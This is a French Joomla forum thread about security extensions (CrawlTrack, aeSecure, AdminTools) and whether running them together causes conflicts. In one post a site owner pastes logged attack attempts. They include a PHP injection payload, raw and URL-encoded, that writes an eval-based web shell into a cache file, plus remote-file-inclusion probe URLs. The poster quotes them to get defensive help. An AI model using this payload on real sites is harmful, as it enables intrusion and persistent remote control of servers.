× Pour discuter des articles publiés sur le site.

Question [sécurité] Crawltrack et Joomla : Une sécurité et des statistiques

Plus d'informations
01 Mai 2016 22:53 #7 par cavo789
Bonjour Scottux

Le logiciel CrawlProtect ne semble en effet plus mis-à-jour (dernière màj début novembre 2013).

Pour aeSecure, pourrais-tu me donner plus d'info s'il te plaît ? Je bloque des URLs qui contiennent des attaques, quel serait l'URL qui, selon toi, aurait dû être bloquée et qui ne l'a pas été ? Ainsi, je pourrais comprendre, te répondre plus précisément et en cas de besoin, ajuster la protection offerte par aeSecure.

Pour tes autres question :
1. CrawlTrack est selon moi un logiciel de suivi; pas un parefeu (ne pas confondre avec CrawlProtect; du même auteur)
2. Si on parle de CrawlProtect, je suggère de ne pas l'utiliser en même temps qu'aeSecure et/ou AdminTools voire tout autre : comme sur ton ordinateur Scottux; tu as je pense un seul antivirus pour éviter que l'un entre en conflit avec l'autre; idem pour les solutions parefeu. Fais un choix et désinstalle les autres au besoin.
3. Tout qui est bloqué par aeSecure se trouve mentionné dans le fichier /aesecure/logs/access_denied.php. Tu as aussi accès à cette information depuis aeSecure, dans le menu Outils -> Log des accès bloqués.
4. Voir réponse 2. ci-dessus. Pour le "me conseillez-vous"; je sors mon jocker :-)

Bonne soirée.

Christophe
Développeur d'aeSecure; suite de protection et d'optimisation de sites web Apache - www.aesecure.com
Votre site a été hacké ? Quelques conseils : www.aesecure.com/fr/blog/site-hacke.html
www.aesecure.com/fr/blog/joomla-securite.html

Connectez-vous ou Créer un compte pour participer à la conversation.

Plus d'informations
02 Mai 2016 10:57 - 02 Mai 2016 10:58 #8 par Scottux
Bonjour cavo et merci pour ta réponse.
C'est bien Crawltrack que j'utilise et pas Crawlprotect. J'ai enlevé Crawlprotect depuis longtemps car il me causait trop de soucis sur mon site.
Crawptrack me signale presque tous les jours des attaques par "injection de codes" mais il ne me donne pas les détails de ces attaques. Je ne peux donc pas te donner plus d'informations sur celles-ci. Je ne sais pas s'il y a un moyen de trouver les détails non-affichés des dernières attaques bloquées par Crawltrack.
D'après le panneau d'admin de Crawltrack, les détails des attaques ne semblent pas être automatiquement sauvegardées. Voilà ce que ça me donne pour la semaine passée.


Si je fais une recherche des attaques sur une période plus longue (Avant install de aeSecure), Crawltrack me sort quelques détails, comme par exemple :
Vous pouvez être exposé si vous utilisez un de ces scripts:
?
Paramètres utilisés pour les tentatives d'injection de code:
cprotect=
Fichier/script que le hacker a tenté d'injecter:
2?http://mon-site.com/forum/83-les-apprentis?cprotect
Url demandées:
/forum/83-les-apprentis?cprotect=2?http://mon-site.com/forum/83-les-apprentis?cprotect=2
Ou encore :
Vous pouvez être exposé si vous utilisez un de ces scripts:
Coppermine Photo Gallery
?
Paramètres utilisés pour les tentatives d'injection de code:
board_url=
referer=
Fichier/script que le hacker a tenté d'injecter:
http://mon-site.com/es/forum
http://mon-site.com
Url demandées:
/mobiquo/smartbanner/welcome.php?referer=http%3A%2F%2Fmon-site.com%2Fes%2Ffo
rum&code=&board_url=http%3A%2F%2Fmon-site.com&lang=en
Ou encore :
Vous pouvez être exposé si vous utilisez un de ces scripts:
?
Paramètres utilisés pour les tentatives d'injection de code:
1=
Fichier/script que le hacker a tenté d'injecter:
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime
(0);echo '->|';file_put_contents(dirname($_SERVER['SCRIPT_FILENAME']).'/cac
he/cachee.php','<?php eval($_POST[1]);?>');echo '|<-';
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime
(0);echo '->|';file_put_contents(dirname($_SERVER['SCRIPT_FILENAME']).'/cac
he/cachee.php','<?php eval($_POST[shine]);?>');echo '|<-';
Url demandées:
//?1=@ini_set(%22display_errors%22,%220%22);@set_time_limit(0);@set_magic_quotes
_runtime(0);echo%20'-%3E%7C';file_put_contents(dirname($_SERVER%5B'SCRIPT_FILENA
ME'%5D).'/cache/cachee.php','%3C?php%20eval($_POST%5B1%5D);?%3E');echo%20'%7C%3C
-';
--------------------------------------------------------------------------------------------
//?1=@ini_set(%22display_errors%22,%220%22);@set_time_limit(0);@set_magic_quotes
_runtime(0);echo%20'-%3E%7C';file_put_contents(dirname($_SERVER%5B'SCRIPT_FILENA
ME'%5D).'/cache/cachee.php','%3C?php%20eval($_POST%5Bshine%5D);?%3E');echo%20'%7
C%3C-';
Le plus souvent, c'est quand même les attaques cprotect=
Je suppose que ça vise Crawlprotect. Pourtant Crawlprotect n'est plus installé sur mon site. Dans les Logs des accès bloqués de aesecure, je ne trouve rien qui concerne cprotect.

Dans ta réponse, tu me parles aussi de AdminTools. Faut il obligatoirement que je désinstalle AdminTools si je décide de conserver aeSecure sur mon site ?

Pas de support en MP sans y être invité.Merci
Merci de vous conformer aux règles du forum.
Pièces jointes :
Dernière édition: 02 Mai 2016 10:58 par Scottux.

Connectez-vous ou Créer un compte pour participer à la conversation.

Plus d'informations
02 Mai 2016 11:53 #9 par cavo789
Salut Scottux

Pour CrawlTract/Protect; je dirais : passons notre chemin. CP n'étant pas installé sur ton site, c'est donc "juste" CT qui est là pour des statistiques et non pour une protection du site. CT n'est plus mis à jour depuis novembre 2011.

Pour AdminTools, le risque d'avoir deux (ou plus) d'antivirus / parefeu, c'est les collusions. AT pourrait détecter certains paramètres d'aeSecure comme potentiellement dangereux et vice-versa. C'est une remarque théorique; cela pourrait arriver.

Si tu te sens bien avec AT, tu peux le garder; pas de souci, c'est un composant suivi et proposant une sécurisation forte.
aeSecure et AT se positionnent un peu différément; avec des avantages de part et d'autres; à toi de faire un choix ;-)

Maintenant, oui, tu pourrais très bien garder les deux jusqu'à la première rencontre d'un conflit et à ce moment-là décider de ce que tu fais. Le choix t'appartient.

Bonne journée.

Christophe
Développeur d'aeSecure; suite de protection et d'optimisation de sites web Apache - www.aesecure.com
Votre site a été hacké ? Quelques conseils : www.aesecure.com/fr/blog/site-hacke.html
www.aesecure.com/fr/blog/joomla-securite.html
Les utilisateur(s) suivant ont remercié: Scottux

Connectez-vous ou Créer un compte pour participer à la conversation.

Plus d'informations
02 Mai 2016 12:36 #10 par Scottux
OK. Merci pour les précisions.
Je vais donc enlever Crawltrack de mon site et conserver pour l'instant aeSecure et AdminTools. Si je constate des conflits, je ferai ensuite un choix.
aeSecure semble vraiment très bien et ne perturbe pas la navigation sur mon site depuis qu'il est installé. L'interface est également très réussie et simple à comprendre.
Tu as fait du bon travail. :bravo

Pas de support en MP sans y être invité.Merci
Merci de vous conformer aux règles du forum.

Connectez-vous ou Créer un compte pour participer à la conversation.

Plus d'informations
02 Mai 2016 14:36 #11 par gagnonjeanfrancois
Bonjour Scottux,

Par simple curiosité... Utilises-tu Admin Tools Pro ou la version gratuite? Quel(s) fonctionnalité(s) Utilises-tu avec Admin Tools qu'Aesecure n'a pas? Peut-être qu'on pourrait t'aider à trouver les outils complémentaires qu'il te manque.

Sinon, je te recommande de faire attention : si tu utilises les deux outils pour construire ton Htaccess tu risques de faire planter ton serveur. Un autre scénario, tu risques d'avoir des requêtes redondantes ce qui va avoir pour impact d'augmenter le temps de chargement de tes pages (Time to first byte) TTFB. Les robots, tel que Google, va "crawler" moins rapidement ton site ou plutôt il va commencer le travail puis reprendre plus tard, ce qui n'est pas très bon pour le référencement.

Google recommande un TTFB de 200 ms, mais ceci est pratiquement impossible pour un CMS à moin d'avoir un serveur virtuelle ou privé et de payer plus de 100$ par mois.... Pour les CMS tel que WordPress, Google, Drupal on doit plus s'attendre à une moyenne de 500ms... Au dessus de 700 ms il y a un problème (un htaccess trop chargé, trop de modules trop de composants, des extensions qui font des mauvaises requêtes mySql, ou un très mauvais serveur)... Tu peux faire tes propos test avec Gtmetrix...

Mon point est qu'il faut que ton site soit sécuritaire, mais si en plus de porter une armure de base, tu portes une ceinture de chasteté et tu rajoutes une seconde armure, juste au cas... Tu vas avoir un sentiment de sécurité, mais ton cheval n'avancera pas très vite et dès que tu vas lui demander de faire des efforts physique il risque de se coucher à terre.

Je sais que ce n'est pas facile de choisir, trop de choix au niveau de la sécurité, trop recommandations et d'extensions de sécurité... Je t'invite à garder un oeil critique (même face à moi), de faire tes lectures et tes propres tests.

Alors voilà, au plaisir!

J'utilise Joomla! depuis 2006. Fondateur de www.LaBoiteLibre.ca, une Boîte de communication et de création web situées à Montréal. Étant donné que j'ai grandi par la communauté, qu'on ne doit pas tout prendre sans donner, je partage mes acquis lorsque j'en ai l'occasion.

Connectez-vous ou Créer un compte pour participer à la conversation.

Plus d'informations
02 Mai 2016 18:53 #12 par Scottux
Bonjour Jean-François et merci pour tes précisions,
J'utilise la version gratuite de AdminTools uniquement pour vérifier et modifier certaines permissions sur les fichiers. Je trouve ça plus pratique qu'avec Filezilla. Je ne génère pas mon htaccess avec AdminTools.
Pour le référencement, je m'en fous un peu car mon site fonctionne plus avec le bouche à oreille qu'avec google. C'est une petite communauté pour une passion qui ne comporte pas beaucoup de passionnés dans le monde. Je n'ai même pas réalisé un fichier du plan de mon site, c'est pour dire. :laugh:
Au niveau de mes extensions, je me contente de celles qui me sont vraiment utiles et je n'en ai pas beaucoup.
Par curiosité, j'avais aussi testé mon site avec Gtmetrix et c'était assez correct.
Le plus important pour moi est de sécuriser au mieux mon site, avec mes faibles connaissances, afin de ne pas perdre son contenu. C'est quand même 10 années de travail. :)

Pas de support en MP sans y être invité.Merci
Merci de vous conformer aux règles du forum.

Connectez-vous ou Créer un compte pour participer à la conversation.

  • Vous ne pouvez pas: Créer un nouveau sujet.
  • Vous ne pouvez pas: Répondre au sujet.
  • Vous ne pouvez pas: Éditer votre message.
Modérateurs: lavstephtramber91Scottuxsergestarter
Temps de génération de la page : 0.197 secondes